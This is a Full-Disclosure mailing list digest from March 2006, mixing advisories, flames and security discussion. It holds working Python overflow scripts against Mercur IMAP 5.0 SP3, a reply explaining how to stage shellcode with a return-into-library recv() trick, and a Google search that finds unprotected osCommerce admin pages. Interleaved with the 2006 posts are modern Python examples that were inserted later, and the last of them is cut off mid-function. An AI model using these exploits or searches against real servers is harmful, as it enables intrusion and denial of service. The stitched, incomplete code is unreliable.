enough to understand what I am saying (and you, like many others make
assumptions). I am saying that SSL has acceptable risks for certain
applications and non-acceptable risks for others. I am also saying that
I am looking for a way to secure "some" of the data going through the
SSL tunnel.
> I'm honestly quite surprised you haven't just replied to the list yet
> with the standard YHBT. YHL. HAND. That's all you are doing here, is
> just trolling, posting crap to get an argument going so you can sit
> back and laugh.
>   
Well, you are surprised because you are an idiot. You assume that I am
doing something that I am not doing.

I've actually had quite a few useful responses to my questions, none
from you of course. But to those who've helped me and understood what I
was asking, Thank You!

>   


-- 
Regards, 
Jackass




[Full-disclosure] Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=% Buffer Overflow in Microsoft Access

2006-03-17 Thread Dave Korn
leToff wrote:
> Christian "Khark" Lauf wrote :
>
>> I know the owner. And it's definetly not an open proxy.
>
> *Yes it is:*
>
> Received: from fred.com (nsg93-x-xx-xx-xxx-xxx.fbx.proxad.net
> [xx.xx.xxx.xxx]) by new.toad.com (8.12.9/8.12.9) with SMTP id
> k2GAtcn6029611
> for [EMAIL PROTECTED]; Thu, 16 Mar 2006 02:56:17 -0800

  I don't see how you could tell from that received header whether the 
machine is a proxy, or whether it originated the traffic itself.


cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





Re: [Full-disclosure] HTTP AUTH BASIC monowall

2006-03-17 Thread Simon Smith
Bkfsec,
Damn well put man! I am glad to see that I'm not the only one who
feels weary about this.

bkfsec wrote:
> [EMAIL PROTECTED] wrote:
>
>>
>> Been there, done that already.  There was a phishing run a while ago,
>> the guys even had a functional SSL cert for www.mountain-america.net
>> (the
>> actual bank was mntamerica.net or something like that..)
>>
>> Only real solution there is to get a good grip on what a CA is actually
>> certifying, which is a certain (usually very minimal) level of
>> *authentication*. They're certifying that somebody convinced them
>> that the cert
>> was for who they claimed it was for.  That's it.  Anybody who
>> attaches any
>> *other* meaning to it is making a big mistake.  In particular,
>> "authorization"
>> is totally out-of-scope here
>>
>> "You are now talking to the site that one of the CAs you trust thinks
>> belongs
>> to Frobozz, Inc.".
>>
>> If you don't trust that CA's judgment, you better heave their root
>> cert overboard...
>>
>>  
>>
> And even then, as your example points out, it's possible for the CA to
> have "good judgment" and still not issue a certificate that is
> labelled to who you or I might think it is.  Company naming is in the
> venue of trademark law... it's not up to the CAs to choose names for
> companies... I could start a company called "Microsoft Software LLC"
> and as long as I wasn't lying through my teeth the CA would be within
> their rights to issue the cert... the trick is that I'd probably not
> win a trademark battle in the courts and that during the lagtime in
> between, I'd probably be able to dupe quite a few people if I were so
> inclined (and I'm not).
>
> All verifying a cert proves is that the computer on the other end has
> the matching cert and that the certificate authorities say that the
> cert is still valid.  That's it.  Nothing else.
>
> Frankly, the whole "web of trust" is a flawed idea.  "Because A trusts
> B, and B trusts C, then A can (must?) trust C" is, excuse the lack of
> civility, utter bullshit.
> I trust my friends, it doesn't mean that I trust their friends.  In
> this case, it's even more flawed because we're not talking about
> trusting a friend of a friend... we're talking about trusting people
> that our friends have met on the street... and that's it.
>
> There's no better replacement for it at this moment, but the
> assumptions made in it are flawed beyond their targetted application.
>
>  -bkfsec
>
>


-- 
Regards, 
Jackass




[Full-disclosure] [SECURITY] [DSA 1008-1] New kpdf packages fix arbitrary code execution

2006-03-17 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1008-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 17th, 2006                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: kdegraphics
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2006-0746

Marcelo Ricardo Leitner noticed that the current patch in DSA 932
(CVE-2005-3627) for kpdf, the PDF viewer for KDE, does not fix all
buffer overflows, still allowing an attacker to execute arbitrary
code.

The old stable distribution (woody) does not contain kpdf packages.

For the stable distribution (sarge) this problem has been fixed in
version 3.3.2-2sarge4.

The unstable distribution (sid) is not affected by this problem.

We recommend that you upgrade your kpdf package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:



RE: [Full-disclosure] What about subscriber only?

2006-03-17 Thread Grant Rietze

Tough call, deciding whether FD has enough intrinsic value to be worth
bothering with adapting rules to filter the latest DDOS on it.

I'm still on the fence.

From: Gareth Davies [mailto:[EMAIL PROTECTED]
Sent: March 16, 2006 11:07 PM
To: php0t
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] What about subscriber only?



 

php0t wrote:

> I know that and I wrote it already! I just said, it would minimize the
> problem, not solve it. All other mailing lists I'm subscribed to handle
> it in this way and there isn't much spam...
>
> This isn't just spam, this is a deliberate flood of mails. If they can't
> send it from whatever-address, they're going to use a list of subscribed
> users' email addresses, and send just as much mail.

Last one was pretty easy to delete.

Just delete all mails with a Received header that contains kundencontroller.de

Done.

--
Gareth Davies - BS7799 LA, OPST
Manager - Security Practice
Network Security Solutions MSC Sdn. Bhd.
Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara,
Mont' Kiara, 50480 Kuala Lumpur, Malaysia
Phone: +603-6203 5303 or +603-6203 5920
www.mynetsec.com






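The "delete all mails with a Received header that contains kundencontroller.de" rule, as an added example that is not the list's or Gareth's own filter: it parses each hop's "by" host, which the receiving MTA writes, instead of substring-matching the whole header, where the HELO name is supplied by the connecting client. The messages are constructed; the fred.com to new.toad.com hop is the header quoted later in this digest, redactions and all, and the rest of the chain is assumed.

```python
import email
import re

# "from <helo> (...) by <host> ..."; a Received line may omit the from-clause,
# so that part of the pattern is optional.
HOP_RE = re.compile(r"(?:\bfrom\s+(?P<helo>\S+).*?)?\bby\s+(?P<by>[\w.-]+)")


def received_hops(raw_message):
    """Return [(helo, by), ...] newest hop first, the order headers are stacked."""
    msg = email.message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())      # unfold continuation lines
        m = HOP_RE.search(text)
        if m:
            hops.append((m.group("helo"), m.group("by").lower().rstrip(".")))
    return hops


def handled_by_blocked_relay(raw_message, blocked_domains):
    """True if any receiving MTA in the chain belongs to a blocked domain."""
    blocked = [d.lower() for d in blocked_domains]
    return any(by == d or by.endswith("." + d)
               for _helo, by in received_hops(raw_message)
               for d in blocked)


def naive_substring_rule(raw_message, needle):
    """The rule as literally stated: any Received header containing needle."""
    msg = email.message_from_string(raw_message)
    return any(needle in v for v in msg.get_all("Received", []))


# Constructed: relayed through new.toad.com; the second hop is the header
# quoted in the digest, the first is an assumed list MX receiving from it.
VIA_TOAD = """\
Received: from new.toad.com (new.toad.com [192.0.2.10])
\tby mx.example.invalid (Postfix) with ESMTP id 0A1B2C
\tfor <list@example.invalid>; Thu, 16 Mar 2006 03:00:02 -0800
Received: from fred.com (nsg93-x-xx-xx-xxx-xxx.fbx.proxad.net [xx.xx.xxx.xxx])
\tby new.toad.com (8.12.9/8.12.9) with SMTP id k2GAtcn6029611
\tfor <list@example.invalid>; Thu, 16 Mar 2006 02:56:17 -0800
From: someone@example.invalid
Subject: constructed sample

body
"""

# Constructed: a direct submission whose HELO merely *claims* a blocked name.
# The substring rule drops it; the relay-based rule does not, because no
# blocked MTA handled it.
HELO_ONLY = """\
Received: from mail.kundencontroller.de (host.example.invalid [192.0.2.20])
\tby mx.example.invalid (Postfix) with ESMTP id 3D4E5F
\tfor <list@example.invalid>; Fri, 17 Mar 2006 10:00:00 +0100
From: someone@example.invalid
Subject: constructed sample

body
"""
```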

[Full-disclosure] MSN Passport Cert improperly issued

2006-03-17 Thread Babak Pasdar

I am not sure if this has been brought up before but...

It seems that MSN's cert for private login to the passport site is
issued for the wrong domain.  

https://login.passport.net/uilogin.srf?lc=1033&id=30017


Babak


Engage in the Daily Security Briefing (DSB) Community Site:
http://dsb.igxglobal.com

New! DSB/Week-in-Review for Week.10 March'06:

Video...
http://dsb.igxglobal.com/page.php?25

Audio...
http://dsb.igxglobal.com/media/dsb-WeekinReview-10.06.mp3

Podcast...
http://dsb.igxglobal.com/plugins/podcast/podcast.php



signature.asc
Description: This is a digitally signed message part


_
igxglobal utilizes state of the art technology from PGP to ensure the safeguard 
of all electronic correspondences.  This message could have been secured by PGP 
Universal. To secure future messages from this sender, please click this link 
and contact your representative at igxglobal for further information:

https://keys.igxglobal.com/b/b.e?r=full-disclosure%40lists.grok.org.uk&n=4Njq7juzEf1Yn9MHjRn9Ow%3D%3D





Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread KF (lists)

Let's get a little more specific even:

Art. L121-4 seems to look like a good way to prevent them from selling 
your code.


http://en.wikipedia.org/wiki/French_copyright_law


   Moral rights

French copyright law treats a protected work as an extension of the 
personality of the author which is protected by a certain number of 
moral rights. In general, the author has the right to "the respect of 
his name, of his status as author, and of his work" (Art. L121-1). The 
following rights are usually recognised:


   * right of publication (/droit de divulgation/): the author is the
 sole judge as to when the work may be first made available to the
 public (Art. L121-2).
   * right of attribution (/droit de paternité/): the author has the
 right to insist that his name and his authorship are clearly stated.
   * right to the respect of the work (/droit au respect de l'intégrité
 de l'oeuvre/): the author can prevent any modification to the work.
   * right of renouncal (/droit de retrait et de repentir/): the author
 can prevent further reproduction, distribution or representation
 of the work (Art. L121-4).
   * right to protection of honour and reputation (/droit à s'opposer à
 toute atteinte préjudiciable à l'honneur et à la réputation/)

...

Art. L122-5 defines the exceptions to French copyright law, which are 
relatively restricted.


Once a work has been published, the author cannot prevent:

   1. Private family performances.
   2. Copies for the private and personal use of the copier. This
   provision does not apply to works of art, computer programs (where a
   single safeguard copy is allowed, Art. L122-6-1-II) and databases.
   3. In cases where the name of the author and the source are clearly
   indicated,

   a) Analyses and short citations justified by the critical,
   polemical, scientific or pedagogical nature of the work.
   b) Press reviews.
   c) Diffusion of public speeches as current news.
   d) Reproductions of works of art in catalogues for auctions in
   France (subject to regulatory restrictions).

   4. Parody, pastiche and caricature, "taking into account the usage
   of the genre".
   5. Acts necessary to access a database within the limits of the
   agreed use.

There is no specific provision for government works or laws: the copyright 
is normally held by the relevant public body.



-KF

Thierry Zoller wrote:

> Dear Rembrandt,
>
> rjd> If you publish something without a license it is OPEN DOMAIN
> rjd> That means people can use it, modify it, sell it...
> That's bull. It's vice versa, meaning even if I just put something new
> somewhere on the web, the author inherently holds copyright.
> -BERN convention.
>
> Please don't spread that FUD any further.





 





[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Michal Zalewski
On Thu, 16 Mar 2006, Michal Zalewski wrote:

> This might not come as a surprise, but there appears to be a *very*
> interesting and apparently very much exploitable overflow in Microsoft
> Internet Explorer (mshtml.dll).

I'd like to make a self-serving statement in response to dozens of people
who pointed out that this month, iDefense pays $10,000 per any
vulnerability that would result in a Microsoft security advisory rated
"critical"...

YES, I HAVE THIS KNOWLEDGE.

I simply do not subscribe to that way of making money. It might be that
I'm insane or dumb, but it feels good.

Regards,
/mz
http://lcamtuf.coredump.cx/



Re: [Full-disclosure] Mercur IMAPD 5.0 SP3 DoS Exploit or more?

2006-03-17 Thread 3APA3A
Dear Tim Taylor,

Same bug was reported for 4.2, see
http://www.security.nnov.ru/news2164.html

A common exploitation solution is placing the rest of the shellcode
somewhere else in memory. In the best case you can place it after
"\r\n", maybe "\r\n\0..." in the same send() buffer, if the vulnerable
application limits the length of the string but receives data into a
larger buffer. You can also use the command tag (a001 in the example),
hostname or other controlled data that can finally be found in the
process memory.

In the worst case you have nothing to control in memory; 135 bytes is
enough to simply recv() the rest of the shellcode. With the suggestion
that there are no more current connections, the socket number will
always be the same. Even more: you can bypass non-executable stack
protection by calling recv() with some known-to-be-allocated dynamic
memory address as a buffer, using the return-into-library technique (see
Solar Designer's article), by overwriting the saved EIP with the recv()
address. To have the received code executed you should place the buffer
address on the stack in the place where recv() expects the saved EIP.
That is, your stack buffer contains no shellcode, but:

flags
len
buf
s
...
buf ;again, as an address recv() use as saved EIP
...
recv;address of recv function from winsock library overwrites saved EIP

--Friday, March 17, 2006, 12:30:44 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

TT> Hi folks,

TT> I found this bug in an imap-server called Mercur IMAP 5.0 SP3 from
TT> http://www.atrium-software.com/, but I was not able to exploit it successfully
TT> for a remote shell on WinXP ServicePack2. The program has an internal check
TT> for the string length or something like that. I can overwrite the EIP
TT> successfully but can not put my shellcode behind the EIP. Because of this
TT> fact I have to write the shellcode in front of the EIP and this results in
TT> 135 bytes for the shellcode without the required "a login" or "a select".
TT> Perhaps someone has a clue and can solve this problem and teach me some
TT> lessons for the future.

TT> -- DoS Exploit --
TT> # Atrium Mercur IMAP 5.0 SP3 DoS Exploit
TT> # pre-authentication buffer overflow in imap command login
TT> import socket
TT> s=socket.socket()
TT> s.connect(("127.0.0.1", 143))
TT> print s.recv(256)
TT> s.send("a001 login " + "\x41" * 275 + "\r\n")

TT> # buffer overflow in imap commands like select and others
TT> import socket
TT> s=socket.socket()
TT> s.connect(("127.0.0.1", 143))
TT> print s.recv(256)
TT> s.send("a001 login test test\r\n")
TT> print s.recv(256)
TT> s.send("a002 select " + "\x41" * 239 + "\r\n")

TT> By the way, at first look it seems to be like some older bugs of this
TT> piece of software, but I do not think so.

TT> Cheers

TT> Tim Taylor



-- 
~/ZARAZA
There are versions of Othello there in which Desdemona strangles the Moor. (Lem)



Re: [Full-disclosure] -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006= % Buffer Overflow in Microsoft Access

2006-03-17 Thread leToff
Christian "Khark" Lauf wrote :

> I know the owner. And it's definetly not an open proxy.

*Yes it is:*

Received: from fred.com (nsg93-x-xx-xx-xxx-xxx.fbx.proxad.net [xx.xx.xxx.xxx])
by new.toad.com (8.12.9/8.12.9) with SMTP id k2GAtcn6029611
for [EMAIL PROTECTED]; Thu, 16 Mar 2006 02:56:17 -0800


-- 
leToff



RE: [Full-disclosure] SSH Scans - Homebrew dictionary

2006-03-17 Thread php0t

Google a couple of words that were tried, and you'll probably find the
whole list.

Fun: make a valid user/pass that is likely to come up based on that
dictionary.
For ftp, just check out what they upload. For SSH, just force them to
use a screened shell and watch what they're trying to do and when you
get bored with it or just simply don't like what you see, you can always
filter outgoing data or just disconnect the poor bastard. Manual
honeypot, we could say.. :-)

  ciao
php0t



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michel
Pereira
Sent: Friday, March 17, 2006 12:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] SSH Scans - Homebrew dictionary


   Hey Perfect Material, I'm Brazilian too :)
   I'm not racist with my own country, I only talk about it because of the
various Brazilian words that are in the log files and the hosts that the
scans come from.

Bye

On 3/17/06, PERFECT. MATERIAL <[EMAIL PROTECTED]> wrote:
>
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such 
> malicious behavior. Please rescind your inflammatory and racist 
> statement or risk gaining a reputation as a person who dislikes his 
> fellow brown person. It's because of people like you that Eazy-E died 
> of AIDS.
>
> PERFECT.MATERIAL
>
> I
>
>
> On 3/16/06, Michel Pereira <[EMAIL PROTECTED]> wrote:
> >
>   After seeing a lot of ssh scans on my firewalls and home PC, I 
> made a script that filters out the "Invalid User" entries inside 
> /var/log/messages and does some cleaning; the result is a 
> dictionary (homebrew) of users that tried to log in to my hosts.
>   In the dictionary I saw English and Brazilian Portuguese words, 
> maybe we have Brazilian hackers running scan bots too.
>   This work is only for experiment and curiosity to see what is 
> happening with the Internet today; you can get the script and dictionary 
> at http://www.michel.eti.br/2006/03/ssh-scans.html
>
>   If you have a better idea or suggestion, please mail me: 
> "[EMAIL PROTECTED]"
>
> Bye
> --
> Only Jesus saves; man makes backups.
>  http://www.michel.eti.br
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Only Jesus saves; man makes backups.
http://www.michel.eti.br

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] Simple Oscommerce Google inurl trick

2006-03-17 Thread Julien GROSJEAN - Proxiad

It returns a lot of things... :)

Joshua Zukerman wrote:

A quick search didn't return anything on the Google Hacking Database.
Submit it here: http://johnny.ihackstuff.com/index.php?module=prodreviews

On 3/6/06, Jodi Middleton <[EMAIL PROTECTED]> wrote:

Simply google inurl trick for Oscommerce for open administrator page.
If no .htpassword is set for the admin folder of osCommerce then of
course you can change any setting in the shop unless password security
has been enabled on the admin console.

Search google for;
inurl:"/admin/configuration. php?" Mystore

Despite a few demo pages there are a few open admin pages for webshops.
Simple patch if you are one is to place a .htpassword file in the root
of the admin folder.

-- J.R.Middleton
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] SSH Scans - Homebrew dictionary

2006-03-17 Thread Michel Pereira
   Hey Perfect Material, I'm Brazilian too :)
   I'm not racist with my own country, I only talk about it because of the
various Brazilian words that are in the log files and the hosts that the
scans come from.

Bye

On 3/17/06, PERFECT. MATERIAL <[EMAIL PROTECTED]> wrote:
>
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such malicious
> behavior. Please rescind your inflammatory and racist statement or risk
> gaining a reputation as a person who dislikes his fellow brown person. It's
> because of people like you that Eazy-E died of AIDS.
>
> PERFECT.MATERIAL
>
> I
>
>
> On 3/16/06, Michel Pereira <[EMAIL PROTECTED]> wrote:
> >
>   After seeing a lot of ssh scans on my firewalls and home PC, I
> made a script that filters out the "Invalid User" entries inside
> /var/log/messages and does some cleaning; the result is a
> dictionary (homebrew) of users that tried to log in to my hosts.
>   In the dictionary I saw English and Brazilian Portuguese words,
> maybe we have Brazilian hackers running scan bots too.
>   This work is only for experiment and curiosity to see what is
> happening with the Internet today; you can get the script and dictionary
> at http://www.michel.eti.br/2006/03/ssh-scans.html
>
>   If you have a better idea or suggestion, please mail me:
> "[EMAIL PROTECTED]"
>
> Bye
> --
> Only Jesus saves; man makes backups.
>  http://www.michel.eti.br
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Only Jesus saves; man makes backups.
http://www.michel.eti.br

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
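What Michel describes in the thread above (pull the sshd "Invalid user" lines out of /var/log/messages, clean them up, and keep the resulting list of usernames, plus a count of which sources sent them) fits in a few lines of Python. This is an added example, not Michel's script from michel.eti.br: the log lines are constructed in the syslog format OpenSSH writes, and the function names and the per-source threshold are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample lines in the syslog format sshd writes to /var/log/messages.
# These are made up for the example, not taken from anyone's real logs.
SAMPLE_LOG = """\
Mar 17 02:11:03 gw sshd[2310]: Invalid user admin from 198.51.100.7
Mar 17 02:11:05 gw sshd[2312]: Invalid user test from 198.51.100.7
Mar 17 02:11:07 gw sshd[2314]: Invalid user oracle from 198.51.100.7
Mar 17 02:11:09 gw sshd[2316]: Failed password for invalid user admin from 198.51.100.7 port 4410 ssh2
Mar 17 03:40:12 gw sshd[2501]: Invalid user joao from 203.0.113.22
Mar 17 03:40:14 gw sshd[2503]: Invalid user admin from 203.0.113.22
Mar 17 03:40:16 gw sshd[2505]: Accepted publickey for alice from 192.0.2.10 port 50122 ssh2
"""

# Match only the "Invalid user <name> from <ip>" line that sshd logs once per
# attempt; the later "Failed password for invalid user ..." line for the same
# attempt deliberately does not match, so nothing is counted twice.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: Invalid user (\S+) from (\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_invalid_users(log_text):
    """Yield (username, source_ip) for every 'Invalid user' line."""
    for line in log_text.splitlines():
        m = INVALID_USER_RE.search(line)
        if m:
            yield m.group(1), m.group(2)


def homebrew_dictionary(log_text):
    """The 'cleaned' result: a deduplicated, sorted list of usernames that were tried."""
    return sorted({user for user, _ in parse_invalid_users(log_text)})


def attempts_per_source(log_text):
    """Number of invalid-user attempts per source address."""
    return Counter(ip for _, ip in parse_invalid_users(log_text))


def noisy_sources(log_text, threshold=3):
    """Sources at or above the threshold; a simple input for a firewall blocklist."""
    return sorted(ip for ip, n in attempts_per_source(log_text).items() if n >= threshold)


if __name__ == "__main__":
    print("dictionary:", homebrew_dictionary(SAMPLE_LOG))
    print("per source:", dict(attempts_per_source(SAMPLE_LOG)))
    print("noisy:", noisy_sources(SAMPLE_LOG))
```

To run it against a real file, replace SAMPLE_LOG with the contents of /var/log/messages (or /var/log/auth.log on distributions that split auth messages out). The `threshold` is an arbitrary starting point; the useful number depends on how much legitimate typo traffic a host sees.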


[Full-disclosure] XCon2006 Call For Paper

2006-03-17 Thread XFOCUS Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

XCon2006 Call For Paper

  XCon2006, the Fifth Information Security Conference, will be held
in Beijing, China, during August 18-20, 2006. China has long been
known as a famous cultural country, while Beijing is the most
splendid place in its history. It dates back to 1000 BC, when
our ancestors already lived and multiplied here and 34 emperors
issued orders and governed the nation successively. There has been
a very mysterious atmosphere around this old cultural city, in which
we express our advancements and personalities, exchange our
technologies and experiences, and share our achievements and
excellences.

  August is the season of harvest, as well as share. These security
professionals at the vanguard of leading information security
technology will share research and unique experience with zealots
from all over the world, and the speakers to be presented in the
conference are among the best, the most intelligent. These
professionals have assembled unique new material that they will
present at this conference to help you maintain your leadership
in this severely competitive technological field, and it must be
the most memorable experience in your life journey.

  This three-day conference will be held in a relaxed and cozy
atmosphere, which will provide an international communion platform
for information security professionals, technicians, security
supervisors, managers, and hacker technology fans. They have their
say and show themselves as much as they like. It is not only a
brilliant symposium, but more importantly, a "party", a "party"
to share the joy of success.

  Welcome to our event and discover amazing China!
Don't hesitate, and join us!

  Target people to participate in the event: any person who is
devoted to information security, including information security
professionals, Internet security hobbyists, network administration
engineers, network security consultants, CIOs and so forth.


SPEAKERS PRIVILEGES
  Speaker whose presentation has been accepted by XCon will
participate in this event to make a speech by himself. They will
enjoy the following privileges:
  * Return economy class air-ticket for one person
  * Hotel accommodation
  * Breakfast, lunch and dinner during conference
  * After-conference party
  * We will organize the speakers to visit some of the famous
historical sites during the day after the meeting, and taste
the flavors in Beijing.
Note:
  * Speakers must offer relevant bill voucher.
  * XCon will be the final arbitrator on this matter.

Please feel free to email XCon at [EMAIL PROTECTED] for the further
information,details and consultation or contact us via
MSN: [EMAIL PROTECTED]


SUBMISSION REQUIREMENTS
Submission must include the following information:
1) Brief biography including list of publications and papers
  published previously.
2) Abstract of speakers' educational or job experience.
3) Contact Information: full name, alias, country of origin,
  net nickname, e-mail, phone, fax, photo, company address,
  any IM contact details (MSN, ICQ, YM, AIM, or any other),
  and special dietary requirements.
4) Speaking details
How long the speech will last
Whether to release new tools
Whether to release new vulnerability
Whether to release new Exploit code
5) Why is your material different or innovative or significant
  or an important tutorial?
6) All submission must include PPT and WORD in English or
  Chinese in either MS Office or OpenOffice format.

  Please send submission to [EMAIL PROTECTED] for selection.
Submission must be done no later than July 1st 2006. The date of
final notification of acceptance or rejection is July 10th 2006.
Whether your Presentation Material is accepted or not, we will
contact you by the information you offer.


IMPORTANT DATES
* Final Submission: July 1st 2006.
* Notification of Acceptance or Rejection: July 10th 2006.


TOPICS
The scopes of topics are broad and include, but not restricted
to the following areas:
- --- Application Security
   - Web Application vulnerability research
   - Automatic Vulnerability Discovery
   - Database Security and hacking
   - Protocol exploits
   - Trojans, Worms , Malware Technology
   - Encrypt,Decrypt,Crack Technology
- --- Intrusion Detection/Forensics Analysis
   - File systems analysis and recovery,
   - Runtime Structures (stack/swap/..) Data recovery,
   - Reverse Engineering (malware analysis, vulnerability research),
   - Intrusion Detection and Evasions technologies
   - Honeypot / HoneyNet related technologies

- --- Wireless and VoIP security
   - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS, 3G Technology
   - PDA and Mobile phone protocol analysis
   - Palm, Pocket Pc security
   - Wireless gateway
   - VoIP security and vulnerability analysis
   - Secure WLANs, vulnerabilities and analysis
- --- P2P Technology
   - Instant message tools (MSN, Skype, ICQ, etc)
   - Chatting tools (IRC, web Chat, etc)
   - P2P down

Re: [Full-disclosure] SSH Scans - Homebrew dictionary

2006-03-17 Thread Fajar Edisya Putera
how about using sshdfilter, it's working fine with me
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re[2]: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread Thierry Zoller
Dear Rembrandt,

rjd> If you publish something without a license it is OPEN DOMAIN
rjd> That means people can use it, modify it, sell it...
That's bull. It's vice versa, meaning even if I just put something new
somewhere on the web, the author inherently holds copyright.
-BERN convention.

Please don't spread that FUD any further.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1007-1] New drupal packages fix several vulnerabilities

2006-03-17 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1007-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                           Martin Schulze
March 17th, 2006                        http://www.debian.org/security/faq
- --

Package: drupal
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-1225 CVE-2006-1226 CVE-2006-1227 CVE-2006-1228


The Drupal Security Team discovered several vulnerabilities in Drupal,
a fully-featured content management and discussion engine.  The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-2006-1225

Due to missing input sanitising a remote attacker could inject
headers of outgoing e-mail messages and use Drupal as a spam
proxy.

CVE-2006-1226

Missing input sanity checks allows attackers to inject arbitrary
web script or HTML.

CVE-2006-1227

Menu items created with the menu.module lacked access control,
which might allow remote attackers to access administrator pages.

CVE-2006-1228

Markus Petrux discovered a bug in the session fixation which may
allow remote attackers to gain Drupal user privileges.

The old stable distribution (woody) does not contain Drupal packages.

For the stable distribution (sarge) these problems have been fixed in
version 4.5.3-6.

For the unstable distribution (sid) these problems have been fixed in
version 4.5.8-1.

We recommend that you upgrade your drupal package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.dsc
  Size/MD5 checksum:  611 71b0ecbc47f9cca214a283ebec5e4600
http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.diff.gz
  Size/MD5 checksum:82810 56bf3a054ca7430c85f50af7ae3927db

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3.orig.tar.gz
  Size/MD5 checksum:   471540 bf093c4c8aca7bba62833ea1df35702f

  Architecture independent components:

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6_all.deb
  Size/MD5 checksum:   501428 94c1787a8eb5be13d6909f442e670cea


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEGoSLW5ql+IAeqTIRAvTuAJ9sD9YUoEFKMzZUxUfqKi/96/j4WQCeLizm
RLS079/UH1PrRo4n36cKZ74=
=emeM
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
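The first problem in the advisory above, CVE-2006-1225, is the classic e-mail header injection: a value the user controls (a subject, a reply address) is pasted into a header line without checking for CR/LF, so one input can end the header and start another. The following added example shows the vulnerable pattern next to the hardened one. It is illustration code written for this page, not Drupal's or Debian's code, and the function names and the constructed inputs are assumptions of the example.

```python
import re

# A header value may never contain a bare CR or LF: either one ends the header
# line, and whatever follows becomes a new header (Bcc:, Cc:, ...) or the body.
CRLF_RE = re.compile(r"[\r\n]")


def is_safe_header_value(value):
    """True when the value contains no CR or LF and can be used as one header."""
    return CRLF_RE.search(value) is None


def build_message_unsafe(to_addr, subject, body):
    """The vulnerable pattern: user-controlled strings go straight into headers."""
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}"


def build_message_safe(to_addr, subject, body):
    """The hardened pattern: reject (do not silently fix) any header value with CR/LF."""
    for name, value in (("To", to_addr), ("Subject", subject)):
        if not is_safe_header_value(value):
            raise ValueError(f"refusing CR/LF in {name} header")
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}"


def header_count(message):
    """How many header lines a rendered message has; used to show the injection."""
    headers, _, _ = message.partition("\r\n\r\n")
    return len(headers.split("\r\n"))


if __name__ == "__main__":
    # Constructed input of the kind a contact form might receive: the subject
    # field carries a line break followed by an extra header.
    hostile_subject = "Hello\r\nBcc: someone@example.org"
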